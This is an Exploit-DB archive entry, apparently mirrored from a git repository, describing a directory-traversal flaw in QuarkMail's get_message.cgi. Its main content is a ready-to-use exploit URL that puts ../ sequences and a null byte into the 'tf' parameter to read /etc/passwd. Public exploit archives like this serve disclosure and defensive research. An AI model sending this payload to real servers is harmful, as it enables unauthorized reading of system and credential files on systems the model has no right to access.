exploit-db-mirror/platforms/php/webapps/34875.txt
Offensive Security dbf77f5aaf Updated 10_05_2014
2014-10-05 04:43:31 +00:00

7 lines
No EOL
450 B
Text
Executable file

source: http://www.securityfocus.com/bid/44226/info
QuarkMail is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
http://www.example.com/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inbox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../ etc/passwd%00&id=2&sort=0&read_flag=yes